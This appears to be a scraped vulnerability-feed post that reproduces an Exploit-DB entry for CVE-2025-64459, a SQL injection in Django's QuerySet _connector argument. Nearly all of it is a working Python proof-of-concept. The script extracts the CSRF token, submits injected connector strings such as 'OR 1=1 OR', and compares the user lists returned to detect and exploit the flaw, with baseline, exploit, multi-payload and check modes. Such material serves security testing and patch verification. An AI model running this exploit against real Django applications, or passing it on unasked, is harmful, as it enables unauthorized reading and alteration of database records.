{“lastseen”:”2025-12-03T18:46:49″,”description”:”Exploit Title: Django 5.1.13 – SQL Injection Google Dork: none Not applicable for this vulnerability Date: 2025-12-03 Exploit Author: Wafcontrol Security Team Vendor Homepage: https:\/\/www.djangoproject.com\/ Software Link:…”,”published”:”2025-12-03T00:00:00″,”modified”:”2025-12-03T00:00:00″,”type”:”exploitdb”,”title”:”Django 5.1.13 – SQL Injection”,”source”:””,”references”:””,”id”:”EDB-ID:52456″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-64459″],”sourceData”:”# Exploit Title: Django 5.1.13 – SQL Injection\\r\\n# Google Dork: [none] # Not applicable for this vulnerability\\r\\n# Date: 2025-12-03\\r\\n# Exploit Author: Wafcontrol Security Team\\r\\n# Vendor Homepage: https:\/\/www.djangoproject.com\/\\r\\n# Software Link: https:\/\/www.djangoproject.com\/download\/\\r\\n# Version: 5.2 before 5.2.8, 5.1 before 5.1.14, 4.2 before 4.2.26 (possibly earlier versions like 5.0.x, 4.1.x, 3.2.x)\\r\\n# Tested on: Ubuntu 24.04 with Django 5.1.13 (vulnerable version)\\r\\n# CVE: 2025-64459\\r\\n\\r\\n\\r\\nDescription:\\r\\nThis proof-of-concept exploits a SQL injection vulnerability in Django’s QuerySet methods (filter, exclude, get) and Q objects\\r\\nwhen using a crafted dictionary with expansion as the _connector argument. The vulnerability allows an attacker to inject\\r\\narbitrary SQL into the WHERE clause, potentially leading to data leakage, modification, or other database compromises.\\r\\n\\r\\nThe script targets a vulnerable Django application endpoint that accepts user input for the _connector parameter.\\r\\nIt supports multiple modes:\\r\\n- baseline: Send a safe request and display results.\\r\\n- exploit: Send an exploit payload and compare with baseline.\\r\\n- multi: Test multiple payloads sequentially.\\r\\n- check: Automatically check if the target appears vulnerable.\\r\\n\\r\\nUsage:\\r\\npython3 exploit.py \\u003cmode\\u003e -u \\u003ctarget_url\\u003e [options]\\r\\n\\r\\nModes:\\r\\n- baseline: Run a safe baseline test.\\r\\n- exploit: Run an exploit test with a single payload.\\r\\n- multi: Test multiple payloads (use -p multiple times or comma-separated).\\r\\n- check: Quick vulnerability check using default payloads.\\r\\n\\r\\nExamples:\\r\\npython3 exploit.py baseline -u http:\/\/target\/\\r\\npython3 exploit.py exploit -u http:\/\/target\/ -p \\”OR 1=1 OR\\”\\r\\npython3 exploit.py multi -u http:\/\/target\/ -p \\”OR 1=1 OR\\” -p \\”AND 1=0 AND\\”\\r\\npython3 exploit.py check -u http:\/\/target\/\\r\\n\\r\\nOptions:\\r\\n- -b, –baseline: Baseline connector value (default: ‘AND’)\\r\\n- -v, –verbose: Enable verbose output\\r\\n- -o, –output: Save output to a file\\r\\n\\r\\nRequirements:\\r\\n- Python 3.x\\r\\n- requests library (pip install requests)\\r\\n\\r\\nNote:\\r\\n- This is for educational and testing purposes only. Use on authorized systems.\\r\\n- Ensure the target endpoint exposes the executed SQL (e.g., via debug mode or custom template) for demonstration.\\r\\n- In a real scenario, adapt the parsing logic to the application’s response structure.\\r\\n- For advanced usage, customize payloads for specific SQL dialects (e.g., SQLite, PostgreSQL).\\r\\n\\r\\n\\r\\nimport re\\r\\nimport sys\\r\\nimport argparse\\r\\nimport json\\r\\nfrom typing import List, Tuple, Optional\\r\\nimport requests\\r\\n\\r\\nDEFAULT_BASELINE = \\”AND\\”\\r\\nDEFAULT_PAYLOADS = [\\”OR 1=1 OR\\”, \\”AND 1=0 AND\\”, \\”OR ‘a’=’a’ OR\\”]\\r\\n\\r\\ndef extract_sql_and_users(html: str) -\\u003e Tuple[Optional[str], List[str]]:\\r\\n \\”\\”\\”\\r\\n Extracts the executed SQL and list of users from the HTML response.\\r\\n Assumes the template structure:\\r\\n – SQL inside \\u003cpre\\u003e…\\u003c\/pre\\u003e\\r\\n – Users inside \\u003cli\\u003eusername \u2013 email\\u003c\/li\\u003e\\r\\n Adjust regex patterns based on the actual response format.\\r\\n \\”\\”\\”\\r\\n # Extract SQL from the first \\u003cpre\\u003e…\\u003c\/pre\\u003e\\r\\n sql_match = re.search(r\\”\\u003cpre\\u003e(.*?)\\u003c\/pre\\u003e\\”, html, re.DOTALL)\\r\\n executed_sql = sql_match.group(1).strip() if sql_match else None\\r\\n \\r\\n # Extract users from \\u003cli\\u003e…\\u003c\/li\\u003e\\r\\n users = re.findall(r\\”\\u003cli\\u003e(.*?)\\u003c\/li\\u003e\\”, html)\\r\\n users = [u.strip() for u in users if u.strip()]\\r\\n \\r\\n return executed_sql, users\\r\\n\\r\\ndef send_payload(target_url: str, connector_value: str, verbose: bool = False) -\\u003e Tuple[Optional[str], List[str]]:\\r\\n \\”\\”\\”\\r\\n Sends a POST request with the connector value as the search field.\\r\\n Handles CSRF token extraction and session management.\\r\\n Returns the executed SQL and list of users from the response.\\r\\n \\”\\”\\”\\r\\n if verbose:\\r\\n print(f\\”[*] Fetching CSRF token from {target_url}…\\”)\\r\\n \\r\\n # Step 1: GET request to fetch CSRF token\\r\\n try:\\r\\n get_resp = requests.get(target_url, timeout=10)\\r\\n get_resp.raise_for_status()\\r\\n except requests.RequestException as e:\\r\\n print(f\\”[!] GET request failed: {e}\\”)\\r\\n sys.exit(1)\\r\\n \\r\\n # Extract csrfmiddlewaretoken from the form\\r\\n csrf_match = re.search(r’name=\\”csrfmiddlewaretoken\\” value=\\”([^\\”]+)\\”‘, get_resp.text)\\r\\n if not csrf_match:\\r\\n print(\\”[!] Could not find CSRF token in the response.\\”)\\r\\n sys.exit(1)\\r\\n csrf_token = csrf_match.group(1)\\r\\n \\r\\n if verbose:\\r\\n print(f\\”[i] CSRF token: {csrf_token[:10]}…\\”)\\r\\n \\r\\n # Prepare POST data\\r\\n data = {\\r\\n \\”csrfmiddlewaretoken\\”: csrf_token,\\r\\n \\”search\\”: connector_value,\\r\\n }\\r\\n \\r\\n # Use session to maintain cookies (including CSRF)\\r\\n session = requests.Session()\\r\\n session.cookies.update(get_resp.cookies)\\r\\n \\r\\n if verbose:\\r\\n print(f\\”[*] Sending POST with connector = {repr(connector_value)}…\\”)\\r\\n \\r\\n # Step 2: POST request with payload\\r\\n try:\\r\\n post_resp = session.post(target_url, data=data, timeout=10)\\r\\n post_resp.raise_for_status()\\r\\n except requests.RequestException as e:\\r\\n print(f\\”[!] POST request failed: {e}\\”)\\r\\n sys.exit(1)\\r\\n \\r\\n # Parse response\\r\\n executed_sql, users = extract_sql_and_users(post_resp.text)\\r\\n return executed_sql, users\\r\\n\\r\\ndef run_baseline(target_url: str, baseline: str, verbose: bool, output_file: Optional[str]) -\\u003e Tuple[Optional[str], List[str]]:\\r\\n print(\\”[*] Running baseline test…\\”)\\r\\n base_sql, base_users = send_payload(target_url, baseline, verbose)\\r\\n print(\\”\\\\n— Baseline (Safe) —\\”)\\r\\n print(\\”Executed SQL:\\”)\\r\\n print(base_sql or \\”(No SQL found)\\”)\\r\\n print(\\”\\\\nUsers Returned:\\”)\\r\\n if base_users:\\r\\n for u in base_users:\\r\\n print(\\” -\\”, u)\\r\\n else:\\r\\n print(\\” (No users)\\”)\\r\\n \\r\\n if output_file:\\r\\n with open(output_file, ‘a’) as f:\\r\\n f.write(\\”— Baseline —\\\\n\\”)\\r\\n f.write(f\\”SQL: {base_sql or ‘None’}\\\\n\\”)\\r\\n f.write(\\”Users: \\” + json.dumps(base_users) + \\”\\\\n\\\\n\\”)\\r\\n \\r\\n return base_sql, base_users\\r\\n\\r\\ndef run_exploit(target_url: str, payload: str, baseline_data: Tuple[Optional[str], List[str]], verbose: bool, output_file: Optional[str]):\\r\\n print(f\\”\\\\n[*] Running exploit with payload = {repr(payload)}…\\”)\\r\\n exploit_sql, exploit_users = send_payload(target_url, payload, verbose)\\r\\n print(\\”\\\\n— Exploit Attempt —\\”)\\r\\n print(\\”Executed SQL:\\”)\\r\\n print(exploit_sql or \\”(No SQL found)\\”)\\r\\n print(\\”\\\\nUsers Returned:\\”)\\r\\n if exploit_users:\\r\\n for u in exploit_users:\\r\\n print(\\” -\\”, u)\\r\\n else:\\r\\n print(\\” (No users)\\”)\\r\\n \\r\\n if output_file:\\r\\n with open(output_file, ‘a’) as f:\\r\\n f.write(f\\”— Exploit: {payload} —\\\\n\\”)\\r\\n f.write(f\\”SQL: {exploit_sql or ‘None’}\\\\n\\”)\\r\\n f.write(\\”Users: \\” + json.dumps(exploit_users) + \\”\\\\n\\\\n\\”)\\r\\n \\r\\n analyze_results(baseline_data[0], baseline_data[1], exploit_sql, exploit_users)\\r\\n\\r\\ndef run_multi(target_url: str, payloads: List[str], baseline: str, verbose: bool, output_file: Optional[str]):\\r\\n base_sql, base_users = run_baseline(target_url, baseline, verbose, output_file)\\r\\n for payload in payloads:\\r\\n run_exploit(target_url, payload, (base_sql, base_users), verbose, output_file)\\r\\n\\r\\ndef run_check(target_url: str, baseline: str, verbose: bool, output_file: Optional[str]):\\r\\n print(\\”[*] Running vulnerability check…\\”)\\r\\n base_sql, base_users = run_baseline(target_url, baseline, verbose, output_file)\\r\\n vulnerable = False\\r\\n for payload in DEFAULT_PAYLOADS:\\r\\n exploit_sql, exploit_users = send_payload(target_url, payload, verbose)\\r\\n if base_users != exploit_users or (base_sql and exploit_sql and base_sql != exploit_sql):\\r\\n print(f\\”[!] Potential vulnerability detected with payload: {repr(payload)}\\”)\\r\\n print(\\” User list or SQL changed, indicating possible injection.\\”)\\r\\n vulnerable = True\\r\\n if output_file:\\r\\n with open(output_file, ‘a’) as f:\\r\\n f.write(f\\”— Check Payload: {payload} —\\\\n\\”)\\r\\n f.write(f\\”SQL: {exploit_sql or ‘None’}\\\\n\\”)\\r\\n f.write(\\”Users: \\” + json.dumps(exploit_users) + \\”\\\\n\\\\n\\”)\\r\\n if vulnerable:\\r\\n print(\\”\\\\n[+] Target appears VULNERABLE.\\”)\\r\\n else:\\r\\n print(\\”\\\\n[-] Target does NOT appear vulnerable (or parsing failed).\\”)\\r\\n\\r\\ndef analyze_results(base_sql: Optional[str], base_users: List[str], exploit_sql: Optional[str], exploit_users: List[str]):\\r\\n print(\\”\\\\n— Analysis —\\”)\\r\\n if base_sql and exploit_sql:\\r\\n print(\\”[i] Compare baseline WHERE clause vs. exploit (visual inspection recommended).\\”)\\r\\n if base_users != exploit_users:\\r\\n print(\\”[!] User list changed between baseline and exploit requests.\\”)\\r\\n print(\\” This indicates the WHERE logic was altered, consistent with SQL injection.\\”)\\r\\n print(\\” If more users are returned, the payload likely bypassed filters.\\”)\\r\\n else:\\r\\n print(\\”[i] User list did NOT change. The target may be patched or the payload ineffective.\\”)\\r\\n else:\\r\\n print(\\”[i] Could not extract SQL from one or more responses.\\”)\\r\\n print(\\” Verify the template includes \\u003cpre\\u003e…\\u003c\/pre\\u003e for SQL display.\\”)\\r\\n\\r\\ndef main():\\r\\n # Parse command-line arguments\\r\\n parser = argparse.ArgumentParser(\\r\\n description=\\”Django CVE-2025-64459 SQL Injection PoC\\”,\\r\\n formatter_class=argparse.RawTextHelpFormatter\\r\\n )\\r\\n subparsers = parser.add_subparsers(dest=’mode’, required=True, help=’Available modes’)\\r\\n\\r\\n # Common arguments\\r\\n def add_common_args(subparser):\\r\\n subparser.add_argument(‘-u’, ‘–url’, required=True, help=’Target URL (e.g., http:\/\/127.0.0.1:8000\/cve-2025-64459\/)’)\\r\\n subparser.add_argument(‘-b’, ‘–baseline’, default=DEFAULT_BASELINE, help=f’Baseline connector value (default: {DEFAULT_BASELINE})’)\\r\\n subparser.add_argument(‘-v’, ‘–verbose’, action=’store_true’, help=’Enable verbose output’)\\r\\n subparser.add_argument(‘-o’, ‘–output’, help=’Save output to a file’)\\r\\n\\r\\n # Baseline mode\\r\\n baseline_parser = subparsers.add_parser(‘baseline’, help=’Run baseline test’)\\r\\n add_common_args(baseline_parser)\\r\\n\\r\\n # Exploit mode\\r\\n exploit_parser = subparsers.add_parser(‘exploit’, help=’Run exploit with single payload’)\\r\\n add_common_args(exploit_parser)\\r\\n exploit_parser.add_argument(‘-p’, ‘–payload’, required=True, help=’Exploit payload for _connector’)\\r\\n\\r\\n # Multi mode\\r\\n multi_parser = subparsers.add_parser(‘multi’, help=’Test multiple payloads’)\\r\\n add_common_args(multi_parser)\\r\\n multi_parser.add_argument(‘-p’, ‘–payload’, action=’append’, help=’Exploit payloads (can be used multiple times)’)\\r\\n\\r\\n # Check mode\\r\\n check_parser = subparsers.add_parser(‘check’, help=’Quick vulnerability check’)\\r\\n add_common_args(check_parser)\\r\\n\\r\\n args = parser.parse_args()\\r\\n \\r\\n target_url = args.url.rstrip(\\”\/\\”) + \\”\/\\”\\r\\n baseline = args.baseline\\r\\n verbose = args.verbose\\r\\n output_file = args.output\\r\\n \\r\\n if output_file:\\r\\n with open(output_file, ‘w’) as f:\\r\\n f.write(f\\”Target: {target_url}\\\\n\\\\n\\”)\\r\\n \\r\\n print(f\\”[+] Target URL: {target_url}\\”)\\r\\n if verbose:\\r\\n print(\\”[i] Verbose mode enabled.\\”)\\r\\n \\r\\n if args.mode == ‘baseline’:\\r\\n run_baseline(target_url, baseline, verbose, output_file)\\r\\n elif args.mode == ‘exploit’:\\r\\n base_sql, base_users = run_baseline(target_url, baseline, verbose, output_file)\\r\\n run_exploit(target_url, args.payload, (base_sql, base_users), verbose, output_file)\\r\\n elif args.mode == ‘multi’:\\r\\n payloads = args.payload or DEFAULT_PAYLOADS\\r\\n if not payloads:\\r\\n print(\\”[!] No payloads provided for multi mode.\\”)\\r\\n sys.exit(1)\\r\\n run_multi(target_url, payloads, baseline, verbose, output_file)\\r\\n elif args.mode == ‘check’:\\r\\n run_check(target_url, baseline, verbose, output_file)\\r\\n\\r\\nif __name__ == \\”__main__\\”:\\r\\n main()”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52456″,”cvss”:{“score”:9.1,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52456″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-03T18:46:49″,”description”:”Exploit Title: Django 5.1.13 – SQL Injection Google Dork: none Not applicable for this vulnerability Date: 2025-12-03 Exploit Author: Wafcontrol Security Team Vendor Homepage: https:\/\/www.djangoproject.com\/…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,10,12,40,13,7,11,5],"class_list":["post-28480","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-91","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n